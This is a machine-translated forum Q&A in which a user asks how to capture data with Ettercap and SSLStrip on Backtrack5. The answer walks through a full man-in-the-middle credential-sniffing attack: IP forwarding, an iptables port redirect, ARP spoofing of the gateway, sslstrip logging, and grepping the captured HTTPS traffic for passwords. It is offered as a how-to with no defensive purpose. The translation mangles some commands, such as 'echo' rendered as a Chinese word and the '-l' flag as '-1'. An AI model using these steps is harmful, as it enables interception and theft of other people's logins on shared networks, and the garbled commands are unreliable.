1

我正在为此使用Backtrack5 ..但被卡住了...我无法获得我想要的数据,我为此使用EttercapSSL Strip ...

这里有人知道怎么做吗?

4

1 回答 1

2

不知道你是怎么做的,但对我来说,ettercap-gtk(gui)一直是垃圾。我建议跳过 ettercap,除非你想要简单的 DNS 欺骗,然后走另一条路。

让我给你一些步骤,首先为这次攻击设置你的 iptables(中间人,amirite)并启用 ip_forward(ing)

回声“1”> /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (可以选择你想发送到的任何端口)

现在成为中间人:这里我们使用 arpspoof: arpspoof -i wlan0(或任何接口)192.168.1.X(X 是网关,通常为 .1 或 .255)

然后使用 SSLStrip,您可以继续使用 ./sslstrip.py -1 1337 -w 文件名(1337 是之前的端口,文件名是您要将数据转储到的任何文件名)

cat 文件名(来自较早)甚至管道 | grep "password" 或任何你正在嗅探的东西,或者你可以转储所有东西。该文件将充满捕获/剥离的 https 数据。

于 2012-08-14T10:59:53.570 回答